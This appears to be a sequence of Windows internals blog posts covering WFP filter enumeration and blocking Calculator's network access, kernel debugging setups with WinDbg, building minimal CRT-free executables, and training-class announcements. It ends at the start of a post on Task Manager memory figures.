What can we do with an engine handle? One thing provided with the management API is enumeration. These are the APIs used by WFP Explorer to enumerate layers, filters, sessions, and other object types in WFP. The following example displays some details for all the filters in the system (error handling omitted for brevity, the project wfpfilters has the full source code):

#include <Windows.h>
#include <fwpmu.h>
#include <stdio.h>
#include <string>

#pragma comment(lib, "Fwpuclnt")

std::wstring GuidToString(GUID const& guid) {
    WCHAR sguid[64];
    return ::StringFromGUID2(guid, sguid, _countof(sguid)) ? sguid : L"";
}

const char* ActionToString(FWPM_ACTION const& action) {
    switch (action.type) {
        case FWP_ACTION_BLOCK:               return "Block";
        case FWP_ACTION_PERMIT:              return "Permit";
        case FWP_ACTION_CALLOUT_TERMINATING: return "Callout Terminating";
        case FWP_ACTION_CALLOUT_INSPECTION:  return "Callout Inspection";
        case FWP_ACTION_CALLOUT_UNKNOWN:     return "Callout Unknown";
        case FWP_ACTION_CONTINUE:            return "Continue";
        case FWP_ACTION_NONE:                return "None";
        case FWP_ACTION_NONE_NO_MATCH:       return "None (No Match)";
    }
    return "";
}

int main() {
    //
    // open a handle to the WFP engine
    //
    HANDLE hEngine;
    FwpmEngineOpen(nullptr, RPC_C_AUTHN_DEFAULT, nullptr, nullptr, &hEngine);

    //
    // create an enumeration handle
    //
    HANDLE hEnum;
    FwpmFilterCreateEnumHandle(hEngine, nullptr, &hEnum);

    UINT32 count;
    FWPM_FILTER** filters;
    //
    // enumerate filters
    //
    FwpmFilterEnum(hEngine, hEnum, 
        8192,       // maximum entries, 
        &filters,   // returned result
        &count);    // how many actually returned

    for (UINT32 i = 0; i < count; i++) {
        auto f = filters[i];
        printf("%ws Name: %-40ws Id: 0x%016llX Conditions: %2u Action: %s\n",
            GuidToString(f->filterKey).c_str(),
            f->displayData.name,
            f->filterId,
            f->numFilterConditions,
            ActionToString(f->action));
    }
    //
    // free memory allocated by FwpmFilterEnum
    //
    FwpmFreeMemory((void**)&filters);

    //
    // close enumeration handle
    //
    FwpmFilterDestroyEnumHandle(hEngine, hEnum);

    //
    // close engine handle
    //
    FwpmEngineClose(hEngine);

    return 0;
}

The enumeration pattern repeats itself with all other WFP object types (layers, callouts, sessions, etc.).
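
For example, here is a minimal sketch of enumerating layers (reusing the engine handle and the GuidToString helper from the filter example above, error handling omitted); the calls mirror the filter enumeration one-for-one:

    HANDLE hEnum;
    FwpmLayerCreateEnumHandle(hEngine, nullptr, &hEnum);

    UINT32 count;
    FWPM_LAYER** layers;
    FwpmLayerEnum(hEngine, hEnum, 512, &layers, &count);

    for (UINT32 i = 0; i < count; i++) {
        auto layer = layers[i];
        printf("%ws Id: %3u Name: %ws\n",
            GuidToString(layer->layerKey).c_str(),
            (UINT32)layer->layerId,
            layer->displayData.name);
    }
    //
    // free memory and close handles, just like with filters
    //
    FwpmFreeMemory((void**)&layers);
    FwpmLayerDestroyEnumHandle(hEngine, hEnum);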

Adding Filters

Let’s see if we can add a filter to perform some useful function. Suppose we want to prevent network access from some process. We can add a filter at an appropriate layer to make it happen. Adding a filter is a matter of calling FwpmFilterAdd:

DWORD FwpmFilterAdd0(
   _In_ HANDLE engineHandle,
   _In_ const FWPM_FILTER0* filter,
   _In_opt_ PSECURITY_DESCRIPTOR sd,
   _Out_opt_ UINT64* id);

The main work is to fill a FWPM_FILTER structure defined like so:

typedef struct FWPM_FILTER0_ {
    GUID filterKey;
    FWPM_DISPLAY_DATA0 displayData;
    UINT32 flags;
    /* [unique] */ GUID *providerKey;
    FWP_BYTE_BLOB providerData;
    GUID layerKey;
    GUID subLayerKey;
    FWP_VALUE0 weight;
    UINT32 numFilterConditions;
    /* [unique][size_is] */ FWPM_FILTER_CONDITION0 *filterCondition;
    FWPM_ACTION0 action;
    /* [switch_is] */ /* [switch_type] */ union 
        {
        /* [case()] */ UINT64 rawContext;
        /* [case()] */ GUID providerContextKey;
        }     ;
    /* [unique] */ GUID *reserved;
    UINT64 filterId;
    FWP_VALUE0 effectiveWeight;
} FWPM_FILTER0;

The weird-looking comments are generated by the Microsoft Interface Definition Language (MIDL) compiler when generating the header file from an IDL file. Although IDL is most commonly used by Component Object Model (COM) to define interfaces and types, WFP uses IDL to define its APIs, even though no COM interfaces are used; just plain C functions. The original IDL files are provided with the SDK, and they are worth checking out, since they may contain developer comments that are not “transferred” to the resulting header files.

Some members in FWPM_FILTER are necessary – layerKey to indicate the layer to attach this filter to, any conditions needed to trigger the filter (numFilterConditions and the filterCondition array), and the action to take if the filter is triggered (the action field).

Let’s create some code that prevents the Windows Calculator from accessing the network. You may be wondering why Calculator would require network access. No, it’s not contacting Google to ask for the result of 2+2. It’s using the Internet to access current exchange rates.

Clicking the Update Rates button causes Calculator to consult the Internet for the updated exchange rate. We’ll add a filter that prevents this.

We’ll start as usual by opening a handle to the WFP engine as was done in the previous example. Next, we need to fill the FWPM_FILTER structure. First, a nice display name:

FWPM_FILTER filter{};   // zero out the structure
WCHAR filterName[] = L"Prevent Calculator from accessing the web";
filter.displayData.name = filterName;

The name has no functional part – it just allows easy identification when enumerating filters. Now we need to select the layer. We’ll also specify the action:

filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V4;
filter.action.type = FWP_ACTION_BLOCK;

There are several layers that could be used for blocking access, with the above layer being good enough to get the job done. Full description of the provided layers, their purpose and when they are used is provided as part of the WFP documentation.

The last part to initialize is the conditions to use. Without conditions, the filter is always going to be invoked, which will block all network access (or just for some processes, based on its effective weight). In our case, we only care about the application – we don’t care about ports or protocols. The layer we selected has several fields, one of which is called ALE App ID (ALE stands for Application Layer Enforcement).

This field can be used to identify an executable. To get that ID, we can use FwpmGetAppIdFromFileName. Here is the code for Calculator’s executable:

WCHAR filename[] = LR"(C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_11.2210.0.0_x64__8wekyb3d8bbwe\CalculatorApp.exe)";
FWP_BYTE_BLOB* appId;
FwpmGetAppIdFromFileName(filename, &appId);

The code uses the path to the Calculator executable on my system – you should change that as needed because Calculator’s version might be different. A quick way to get the executable path is to run Calculator, open Process Explorer, open the resulting process properties, and copy the path from the Image tab.

The R"( prefix and the closing )" in the above snippet form a raw string literal, which disables the “escaping” property of backslashes, making it easier to write file paths (a C++11 feature).

The return value from FwpmGetAppIdFromFileName is a BLOB that needs to be freed eventually with FwpmFreeMemory.

Now we’re ready to specify the one and only condition:

FWPM_FILTER_CONDITION cond;
cond.fieldKey = FWPM_CONDITION_ALE_APP_ID;      // field
cond.matchType = FWP_MATCH_EQUAL;
cond.conditionValue.type = FWP_BYTE_BLOB_TYPE;
cond.conditionValue.byteBlob = appId;

filter.filterCondition = &cond;
filter.numFilterConditions = 1;

The conditionValue member of FWPM_FILTER_CONDITION is a FWP_VALUE, which is a generic way to specify many types of values. It has a type member that indicates the member in a big union that should be used. In our case, the type is a BLOB (FWP_BYTE_BLOB_TYPE) and the actual value should be passed in the byteBlob union member.

The last step is to add the filter, and repeat the exercise for IPv6, as we don’t know how Calculator connects to the currency exchange server (we can find out, but it would be simpler and more robust to just block IPv6 as well):

FwpmFilterAdd(hEngine, &filter, nullptr, nullptr);

filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;   // IPv6
FwpmFilterAdd(hEngine, &filter, nullptr, nullptr);

We didn’t specify any GUID for the filter. This causes WFP to generate one. We didn’t specify a weight, either – WFP will generate that as well.

All that’s left now is some cleanup:

FwpmFreeMemory((void**)&appId);
FwpmEngineClose(hEngine);

Running this code (elevated) and then trying to refresh the currency exchange rate in Calculator should fail. Note that there is no need to restart Calculator – the effect is immediate.

We can locate the filters added with WFP Explorer:

Double-clicking one of the filters and selecting the Conditions tab shows the only condition where the App ID is revealed to be the full path of the executable in device form. Of course, you should not take any dependency on this format, as it may change in the future.

You can right-click the filters and delete them using WFP Explorer. The FwpmFilterDeleteByKey API is used behind the scenes. This will restore Calculator’s exchange rate update functionality.
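
The filters can also be removed programmatically. As a minimal sketch (not part of the walkthrough above), if we capture the IDs returned by FwpmFilterAdd, we can later delete the filters with FwpmFilterDeleteById:

UINT64 filterIdV4 = 0, filterIdV6 = 0;
FwpmFilterAdd(hEngine, &filter, nullptr, &filterIdV4);

filter.layerKey = FWPM_LAYER_ALE_AUTH_CONNECT_V6;   // IPv6
FwpmFilterAdd(hEngine, &filter, nullptr, &filterIdV6);

// ...later, to undo the block:
FwpmFilterDeleteById(hEngine, filterIdV4);
FwpmFilterDeleteById(hEngine, filterIdV6);
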

Upcoming Public Training Classes for April/May

16 February 2023 at 22:02

Today I’m happy to announce two training classes to take place in April and May. These classes will be in 4-hour session chunks, so that it’s easier to consume even for uncomfortable time zones.

The first is Advanced Windows Kernel Programming, a class I was promising for quite some time now… it will be held on the following dates:

  • April: 18, 20, 24, 27 and May: 1, 4, 8, 11 (4 days total)
  • Times: 11am to 3pm ET (8am-12pm PT, 4pm to 8pm UT/GMT)

The course will include advanced topics in Windows kernel development, and is recommended for those that were in my Windows Kernel Programming class or have equivalent knowledge; for example, by reading my book Windows Kernel Programming.

Example topics include: deep dive into Windows’ kernel design, working with APCs, Windows Filtering Platform callout drivers, advanced memory management techniques, plug & play filter drivers, and more!

The second class is Windows Internals to be held on the following dates:

  • May: 2, 3, 9, 10, 15, 18, 22, 24, 30 and June: 1, 5 (5.5 days)
  • Times: 11am to 3pm ET (8am-12pm PT, 4pm to 8pm UT/GMT)

The syllabus can be found here (some modifications possible, but the general outline remains).

Cost
950 USD (if paid by an individual), 1900 USD (if paid by a company). The cost is the same for these training classes. Previous students in my classes get 10% off.
Multiple participants from the same company get a discount as well (contact me for the details).

If you’d like to register, please send me an email to [email protected] with the name of the training in the email title, provide your full name, company (if any), preferred contact email, and your time zone.

The sessions will be recorded, so you can watch any part you may be missing, or that may be somewhat overwhelming in “real time”.

As usual, if you have any questions, feel free to send me an email, or DM on twitter (@zodiacon) or Linkedin (https://www.linkedin.com/in/pavely/).


Windows Kernel Programming Class Recordings

20 February 2023 at 13:33

I’ve recently posted about the upcoming training classes, the first of which is Advanced Windows Kernel Programming in April. Some people have asked me how they can participate if they have not taken the Windows Kernel Programming fundamentals class, and they might not have the required time to read the book.

Since I don’t plan on providing the fundamentals training class before April, after some thought, I decided to do the following.

I am selling one of the previous Windows Kernel Programming class recordings, along with the course PDF materials, the labs, and solutions to the labs. This is the first time I’m selling recordings of my public classes. If this “experiment” goes well, I might consider doing this with other classes as well. Having recordings is not the same as doing a live training class, but it’s the next best thing if the knowledge provided is valuable and useful. It’s about 32 hours of video, and plenty of labs to keep you busy 🙂

As an added bonus, I am also giving the following to those purchasing the training class:

  • You get 10% discount for the Advanced Windows Kernel Programming class in April.
  • You will be added to a discord server that will host all the Alumni from my public classes (an idea I was given by some of my students which will happen soon)
  • A live session with me sometime in early April (I’ll do a couple in different times of day so all time zones can find a comfortable session) where you can ask questions about the class, etc.

These are the modules covered in the class recordings:

  • Module 0: Introduction
  • Module 1: Windows Internals Overview
  • Module 2: The I/O System
  • Module 3: Device Driver Basics
  • Module 4: The I/O Request Packet
  • Module 5: Kernel Mechanisms
  • Module 6: Process and Thread Monitoring
  • Module 7: Object and Registry Notifications
  • Module 8: File System Mini-Filters Fundamentals
  • Module 9: Miscellaneous Techniques

If you’re interested in purchasing the class, send me an email to [email protected] with the title “Kernel Programming class recordings” and I will reply with payment details. Once paid, reply with the payment information, and I will share a link with the course. I’m working on splitting the recordings into meaningful chunks, so not all are ready yet, but these will be completed in the next day or so.

Here are the rules after a purchase:

  • No refunds – once you have access to the recordings, this is it.
  • No sharing – the content is for your own personal viewing. No sharing of any kind is allowed.
  • No reselling – I own the copyright and all rights.

The cost is 490 USD for the entire class. That’s the whole 32 hours.

If you’re part of a company (or simply have friends) that would like to purchase multiple “licenses”, contact me for a discount.

Levels of Kernel Debugging

7 March 2023 at 17:01

Doing any kind of research into the Windows kernel requires working with a kernel debugger, mostly WinDbg (or WinDbg Preview). There are at least 3 “levels” of debugging the kernel.

Level 1: Local Kernel Debugging

The first is using a local kernel debugger, which means configuring WinDbg to look at the kernel of the local machine. This can be configured by running the following command in an elevated command window, and restarting the system:

bcdedit -debug on

You must disable Secure Boot (if enabled) for this command to work, as Secure Boot protects against putting the machine in local kernel debugging mode. Once the system is restarted, launch WinDbg elevated, select File/Kernel Debug, and go with the “Local” option (WinDbg Preview shown):

If all goes well, you’ll see the “lkd>” prompt appearing, confirming you’re in local kernel debugging mode.

What can you do in this mode? You can look at anything in kernel and user space, such as listing the currently existing processes (!process 0 0), or examining any memory location in kernel or user space. You can even change kernel memory if you so desire, but be careful – any “bad” change may crash your system.

The downside of local kernel debugging is that the system is a moving target – things change while you’re typing commands, so you don’t want to look at things that change quickly. Additionally, you cannot set any breakpoints, and you cannot view CPU registers, since these are changing constantly and are per-CPU anyway.

The upside of local kernel debugging is convenience – setting it up is very easy, and you can still get a lot of information with this mode.

Level 2: Remote Debugging of a Virtual Machine

The next level is a full kernel debugging experience of a virtual machine, which can be running locally on your host machine, or perhaps on another host somewhere. Setting this up is more involved. First, the target VM must be set up to allow kernel debugging and set the “interface” to the host debugger. Windows supports several interfaces, but for a VM the best to use is network (supported on Windows 8 and later).

First, go to the VM and ping the host to find out its IP address. Then type the following:

bcdedit /dbgsettings net hostip:172.17.32.1 port:55000 key:1.2.3.4

Replace the host IP with the correct address, and select an unused port on the host. The key can be left out, in which case the command will generate something for you. Since that key is needed on the host side, it’s easier to select something simple. If the target VM is not local, you might prefer to let the command generate a random key and use that.

Next, launch WinDbg elevated on the host, and attach to the kernel using the “Net” option, specifying the correct port and key:

Restart the target, and it should connect early in its boot process:

Microsoft (R) Windows Debugger Version 10.0.25200.1003 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

Using NET for debugging
Opened WinSock 2.0
Waiting to reconnect...
Connected to target 172.29.184.23 on port 55000 on local IP 172.29.176.1.
You can get the target MAC address by running .kdtargetmac command.
Connected to Windows 10 25309 x64 target at (Tue Mar  7 11:38:18.626 2023 (UTC - 5:00)), ptr64 TRUE
Kernel Debugger connection established.  (Initial Breakpoint requested)

************* Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       SRV*d:\Symbols*https://msdl.microsoft.com/download/symbols
Symbol search path is: SRV*d:\Symbols*https://msdl.microsoft.com/download/symbols
Executable search path is: 
Windows 10 Kernel Version 25309 MP (1 procs) Free x64
Edition build lab: 25309.1000.amd64fre.rs_prerelease.230224-1334
Machine Name:
Kernel base = 0xfffff801`38600000 PsLoadedModuleList = 0xfffff801`39413d70
System Uptime: 0 days 0:00:00.382
nt!DebugService2+0x5:
fffff801`38a18655 cc              int     3

Enter the g command to let the system continue. The prompt is “kd>” with the current CPU number on the left. You can break at any point into the target by clicking the “Break” toolbar button in the debugger. Then you can set up breakpoints, for whatever you’re researching. For example:

1: kd> bp nt!ntWriteFile
1: kd> g
Breakpoint 0 hit
nt!NtWriteFile:
fffff801`38dccf60 4c8bdc          mov     r11,rsp
2: kd> k
 # Child-SP          RetAddr               Call Site
00 fffffa03`baa17428 fffff801`38a81b05     nt!NtWriteFile
01 fffffa03`baa17430 00007ff9`1184f994     nt!KiSystemServiceCopyEnd+0x25
02 00000095`c2a7f668 00007ff9`0ec89268     0x00007ff9`1184f994
03 00000095`c2a7f670 0000024b`ffffffff     0x00007ff9`0ec89268
04 00000095`c2a7f678 00000095`c2a7f680     0x0000024b`ffffffff
05 00000095`c2a7f680 0000024b`00000001     0x00000095`c2a7f680
06 00000095`c2a7f688 00000000`000001a8     0x0000024b`00000001
07 00000095`c2a7f690 00000095`c2a7f738     0x1a8
08 00000095`c2a7f698 0000024b`af215dc0     0x00000095`c2a7f738
09 00000095`c2a7f6a0 0000024b`0000002c     0x0000024b`af215dc0
0a 00000095`c2a7f6a8 00000095`c2a7f700     0x0000024b`0000002c
0b 00000095`c2a7f6b0 00000000`00000000     0x00000095`c2a7f700
2: kd> .reload /user
Loading User Symbols
.....................
2: kd> k
 # Child-SP          RetAddr               Call Site
00 fffffa03`baa17428 fffff801`38a81b05     nt!NtWriteFile
01 fffffa03`baa17430 00007ff9`1184f994     nt!KiSystemServiceCopyEnd+0x25
02 00000095`c2a7f668 00007ff9`0ec89268     ntdll!NtWriteFile+0x14
03 00000095`c2a7f670 00007ff9`08458dda     KERNELBASE!WriteFile+0x108
04 00000095`c2a7f6e0 00007ff9`084591e6     icsvc!ICTransport::PerformIoOperation+0x13e
05 00000095`c2a7f7b0 00007ff9`08457848     icsvc!ICTransport::Write+0x26
06 00000095`c2a7f800 00007ff9`08452ea3     icsvc!ICEndpoint::MsgTransactRespond+0x1f8
07 00000095`c2a7f8b0 00007ff9`08452abc     icsvc!ICTimeSyncReferenceMsgHandler+0x3cb
08 00000095`c2a7faf0 00007ff9`084572cf     icsvc!ICTimeSyncMsgHandler+0x3c
09 00000095`c2a7fb20 00007ff9`08457044     icsvc!ICEndpoint::HandleMsg+0x11b
0a 00000095`c2a7fbb0 00007ff9`084574c1     icsvc!ICEndpoint::DispatchBuffer+0x174
0b 00000095`c2a7fc60 00007ff9`08457149     icsvc!ICEndpoint::MsgDispatch+0x91
0c 00000095`c2a7fcd0 00007ff9`0f0344eb     icsvc!ICEndpoint::DispatchThreadFunc+0x9
0d 00000095`c2a7fd00 00007ff9`0f54292d     ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x3b
0e 00000095`c2a7fd30 00007ff9`117fef48     KERNEL32!BaseThreadInitThunk+0x1d
0f 00000095`c2a7fd60 00000000`00000000     ntdll!RtlUserThreadStart+0x28
2: kd> !process -1 0
PROCESS ffffc706a12df080
    SessionId: 0  Cid: 0828    Peb: 95c27a1000  ParentCid: 044c
    DirBase: 1c57f1000  ObjectTable: ffffa50dfb92c880  HandleCount: 123.
    Image: svchost.exe

In this “level” of debugging you have full control of the system. When in a breakpoint, nothing is moving. You can view register values, call stacks, etc., without anything changing “under your feet”. This seems perfect, so do we really need another level?

Some aspects of a typical kernel might not show up when debugging a VM. For example, looking at the list of interrupt service routines (ISRs) with the !idt command on my Hyper-V VM shows something like the following (truncated):

2: kd> !idt

Dumping IDT: ffffdd8179e5f000

00:	fffff80138a79800 nt!KiDivideErrorFault
01:	fffff80138a79b40 nt!KiDebugTrapOrFault	Stack = 0xFFFFDD8179E95000
02:	fffff80138a7a140 nt!KiNmiInterrupt	Stack = 0xFFFFDD8179E8D000
03:	fffff80138a7a6c0 nt!KiBreakpointTrap
...
2e:	fffff80138a80e40 nt!KiSystemService
2f:	fffff80138a75750 nt!KiDpcInterrupt
30:	fffff80138a733c0 nt!KiHvInterrupt
31:	fffff80138a73720 nt!KiVmbusInterrupt0
32:	fffff80138a73a80 nt!KiVmbusInterrupt1
33:	fffff80138a73de0 nt!KiVmbusInterrupt2
34:	fffff80138a74140 nt!KiVmbusInterrupt3
35:	fffff80138a71d88 nt!HalpInterruptCmciService (KINTERRUPT ffffc70697f23900)

36:	fffff80138a71d90 nt!HalpInterruptCmciService (KINTERRUPT ffffc70697f23a20)

b0:	fffff80138a72160 ACPI!ACPIInterruptServiceRoutine (KINTERRUPT ffffdd817a1ecdc0)
...

Some things are missing, such as the keyboard interrupt handler. This is because certain things are handled “internally”, as the VM is “enlightened”, meaning it “knows” it’s a VM. Normally, it’s a good thing – you get nice support for copy/paste between the VM and the host, seamless mouse and keyboard interaction, etc. But it does mean it’s not the same as a physical machine.

Level 3: Remote debugging of a physical machine

In this final level, you’re debugging a physical machine, which provides the most “authentic” experience. Setting this up is the trickiest. A full description of how to set it up is provided in the debugger documentation. In general, it’s similar to the previous case, but network debugging might not work for you, depending on the network card type your target and host machines have.

If network debugging is not supported because of the limited list of network cards supported, your best bet is USB debugging using a dedicated USB cable that you must purchase. The instructions to set up USB debugging are provided in the docs, but it may require some trial and error to locate the USB ports that support debugging (not all do). Once you have that set up, you’ll use the “USB” tab in the kernel attachment dialog on the host. Once connected, you can set breakpoints in ISRs that may not exist on a VM:

: kd> !idt

Dumping IDT: fffff8022f5b1000

00:	fffff80233236100 nt!KiDivideErrorFault
...
80:	fffff8023322cd70 i8042prt!I8042KeyboardInterruptService (KINTERRUPT ffffd102109c0500)
...
Dumping Secondary IDT: ffffe5815fa0e000 

01b0:hidi2c!OnInterruptIsr (KMDF) (KINTERRUPT ffffd10212e6edc0)

0: kd> bp i8042prt!I8042KeyboardInterruptService
0: kd> g
Breakpoint 0 hit
i8042prt!I8042KeyboardInterruptService:
fffff802`6dd42100 4889542410      mov     qword ptr [rsp+10h],rdx
0: kd> k
 # Child-SP          RetAddr               Call Site
00 fffff802`2f5cdf48 fffff802`331453cb     i8042prt!I8042KeyboardInterruptService
01 fffff802`2f5cdf50 fffff802`3322b25f     nt!KiCallInterruptServiceRoutine+0x16b
02 fffff802`2f5cdf90 fffff802`3322b527     nt!KiInterruptSubDispatch+0x11f
03 fffff802`2f5be9f0 fffff802`3322e13a     nt!KiInterruptDispatch+0x37
04 fffff802`2f5beb80 00000000`00000000     nt!KiIdleLoop+0x5a

Happy debugging!

Minimal Executables

15 March 2023 at 23:17

Here is a simple experiment to try: open Visual Studio and create a C++ console application. All the app does is display “hello, world” to the console:

#include <stdio.h>

int main() {
	printf("Hello, world!\n");
	return 0;
}

Build the executable in Release mode and check its size. I get 11KB (x64). Not too bad, perhaps. However, if we check the dependencies of this executable (using the dumpbin command line tool or any PE viewer), we’ll find the following in the Import directory:

There are two dependencies: Kernel32.dll and VCRuntime140.dll. This means these DLLs will load at process start time no matter what. If any of these DLLs is not found, the process will crash. We can’t get rid of Kernel32 easily, but we may be able to link statically to the CRT. Here is the required change to VS project properties:

After building, the resulting executable jumps to 136KB in size! Remember, it’s a “hello, world” application. The Imports directory in a PE viewer now shows Kernel32.dll as the only dependency.

Is that the best we can do? Why do we need the CRT in the first place? One obvious reason is the usage of the printf function, which is implemented by the CRT. Maybe we can use something else without depending on the CRT. There are other reasons the CRT is needed. Here are a few:

  • The CRT is the one calling our main function with the correct argc and argv. This is expected behavior by developers.
  • Any C++ global objects that have constructors are executed by the CRT before the main function is invoked (see the sketch after this list).
  • Other expected behaviors are provided by the CRT, such as correct handling of the errno (global) variable, which is not really global, but uses Thread-Local-Storage behind the scenes to make it per-thread.
  • The CRT implements the new and delete C++ operators, without which much of the C++ standard library wouldn’t work without major customization.

Still, we may be OK doing things outside the CRT, taking care of ourselves. Let’s see if we can pull it off. Let’s tell the linker that we’re not interested in the CRT:

Setting “Ignore All Default Libraries” tells the linker we’re not interested in linking with the CRT in any way. Building the app now gives some linker errors:

1>Test2.obj : error LNK2001: unresolved external symbol __security_check_cookie
1>Test2.obj : error LNK2001: unresolved external symbol __imp___acrt_iob_func
1>Test2.obj : error LNK2001: unresolved external symbol __imp___stdio_common_vfprintf
1>LINK : error LNK2001: unresolved external symbol mainCRTStartup
1>D:\Dev\Minimal\x64\Release\Test2.exe : fatal error LNK1120: 4 unresolved externals

One thing we expected is the missing printf implementation. What about the other errors? We have the missing “security cookie” implementation, which is a feature of the CRT to try to detect stack overruns by placing a “cookie” – some number – before making certain function calls and making sure that cookie is still there after returning. We’ll have to do without this feature. The main missing piece is mainCRTStartup, which is the default entry point that the linker is expecting. We can change the expected name (via the linker’s /ENTRY option), or rename main to have that name.

First, let’s try to fix the linker errors before reimplementing the printf functionality. We’ll remove the printf call and rebuild. Things are improving:

>Test2.obj : error LNK2001: unresolved external symbol __security_check_cookie
1>LINK : error LNK2001: unresolved external symbol mainCRTStartup
1>D:\Dev\Minimal\x64\Release\Test2.exe : fatal error LNK1120: 2 unresolved externals

The “security cookie” feature can be removed with another compiler option:

When rebuilding, we get a warning about the “/sdl” (Security Development Lifecycle) option conflicting with removing the security cookie, which we can remove as well. Regardless, the final linker error remains – mainCRTStartup.

We can rename main to mainCRTStartup and “implement” printf by going straight to the console API (part of Kernel32.Dll):

#include <Windows.h>

int mainCRTStartup() {
	char text[] = "Hello, World!\n";
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

	return 0;
}

This compiles and links ok, and we get the expected output. The file size is only 4KB! An improvement even over the initial project. The dependencies are still just Kernel32.DLL, with the only two functions used:

You may be thinking that although we replaced printf, that wasn’t the full power of printf – it supports various format specifiers, etc., which are going to be difficult to reimplement. Is this just a futile exercise?

Not necessarily. Remember that every user mode process always links with NTDLL.dll, which means the API in NtDll is always available. As it turns out, a lot of functionality that is implemented by the CRT is also implemented in NTDLL. printf is not there, but the next best thing is – sprintf and the other similar formatting functions. They would fill a buffer with the result, and then we could call WriteConsole to spit it to the console. Problem solved!

Removing the CRT

Well, almost. Let’s add a declaration for sprintf_s (we’ll be nice and go with the “safe” version), and then use it:

#include <Windows.h>

extern "C" int __cdecl sprintf_s(
	char* buffer,
	size_t sizeOfBuffer,
	const char* format,	...);

int mainCRTStartup() {
	char text[64];
	sprintf_s(text, _countof(text), "Hello, world from process %u\n", ::GetCurrentProcessId());
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

	return 0;
}

Unfortunately, this does not link: sprintf_s is an unresolved external, just like strlen. It makes sense, since the linker does not know where to look for it. Let’s help out by adding the import library for NtDll:

#pragma comment(lib, "ntdll")

This should work, but one error persists – sprintf_s; strlen, however, is resolved. The reason is that the import library for NtDll provided by Microsoft does not have an import entry for sprintf_s and other CRT-like functions. Why? No good reason I can think of. What can we do? One option is to create an NtDll.lib import library of our own and use it. In fact, some people have already done that. One such file can be found as part of my NativeApps repository (it’s called NtDll64.lib, though the name does not really matter). The other option is to link dynamically. Let’s do that:

int __cdecl sprintf_s_f(
	char* buffer, size_t sizeOfBuffer, const char* format, ...);

int mainCRTStartup() {
	auto sprintf_s = (decltype(sprintf_s_f)*)::GetProcAddress(
        ::GetModuleHandle(L"ntdll"), "sprintf_s");
	if (sprintf_s) {
		char text[64];
		sprintf_s(text, _countof(text), "Hello, world from process %u\n", ::GetCurrentProcessId());
		::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
			text, (DWORD)strlen(text), nullptr, nullptr);
	}

	return 0;
}

Now it works and runs as expected.

You may be wondering why does NTDLL implement the CRT-like functions in the first place? The CRT exists, after all, and can be normally used. “Normally” is the operative word here. Native applications, those that can only depend on NTDLL cannot use the CRT. And this is why these functions are implemented as part of NTDLL – to make it easier to build native applications. Normally, native applications are built by Microsoft only. Examples include Smss.exe (the session manager), CSrss.exe (the Windows subsystem process), and UserInit.exe (normally executed by WinLogon.exe on a successful login).

One thing that may be missing in our “main” function is command line arguments. Can we just add the classic argc and argv and go about our business? Let’s try:

int mainCRTStartup(int argc, const char* argv[]) {
//...
char text[64];
sprintf_s(text, _countof(text), 
    "argc: %d argv[0]: 0x%p\n", argc, argv[0]);
::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
	text, (DWORD)strlen(text), nullptr, nullptr);

Seems simple enough. argv[0] should be the address of the executable path itself. The code carefully displays the address only, not trying to dereference it as a string. The result, however, is perplexing:

argc: -359940096 argv[0]: 0x74894808245C8948

This seems completely wrong. The reason we see these weird values (if you try it, you’ll get different values; in fact, you may get different values in every run!) is that the parameters expected by a true entry point of an executable are not argc and argv – those are part of the CRT magic. We don’t have a CRT anymore. There is in fact just one argument, and it’s the Process Environment Block (PEB). We can add some code to show some of what is in there (non-relevant code omitted):

#include <Windows.h>
#include <winternl.h>
//...
int mainCRTStartup(PPEB peb) {
	char text[256];
	sprintf_s(text, _countof(text), "PEB: 0x%p\n", peb);
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

	sprintf_s(text, _countof(text), "Executable: %wZ\n", 
        peb->ProcessParameters->ImagePathName);
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

	sprintf_s(text, _countof(text), "Commandline: %wZ\n", 
        peb->ProcessParameters->CommandLine);
	::WriteConsoleA(::GetStdHandle(STD_OUTPUT_HANDLE),
		text, (DWORD)strlen(text), nullptr, nullptr);

<Winternl.h> contains some NTDLL definitions, such as a partially defined PEB. In it, there is a ProcessParameters member that holds the image path and the full command line. Here is the result on my console:

PEB: 0x000000EAC01DB000
Executable: D:\Dev\Minimal\x64\Release\Test3.exe
Commandline: "D:\Dev\Minimal\x64\Release\Test3.exe"

The PEB is the argument provided by the OS to the entry point, whatever its name is. This is exactly what native applications get as well. By the way, we could have used GetCommandLine from Kernel32.dll to get the command line if we didn’t add the PEB argument. But for native applications (that can only depend on NTDLL), GetCommandLine is not an option.

Going Native

How far are we from a true native application? What would be the motivation for such an application anyway, besides small file size and reduced dependencies? Let’s start with the first question.

To make our executable truly native, we have to do two things. The first is to change the subsystem of the executable (stored in the PE header) to Native. VS provides this option via a linker setting:

The second thing is to remove the dependency on Kernel32.Dll. No more WriteConsole and no GetCurrentProcessId. We will have to find some equivalent in NTDLL, or write our own implementation leveraging what NtDll has to offer. This is obviously not easy, given that most of NTDLL is undocumented, but most function prototypes are available as part of the Process Hacker/phnt project.

For the second question – why bother? Well, one reason is that native applications can be configured to run very early in Windows boot – these are in fact run by Smss.exe itself, when it’s the only existing user-mode process at that time. Such applications (like autochk.exe, a native chkdsk.exe) must be native – they cannot depend on the CRT or even on kernel32.dll, since the Windows Subsystem Process (csrss.exe) has not been launched yet.

For more information on Native Applications, you can view my talk on the subject.

I may write a blog post on native applications to give more details. The examples shown here can be found here.

Happy minimization!

Memory Information in Task Manager

12 April 2023 at 14:36

You may have been asked this question many times: “How much memory does this process consume?” The question seems innocent enough. Your first instinct might be to open Task Manager, go to the Processes tab, find the process in the list, and look at the column marked “Memory“. What could be simpler?

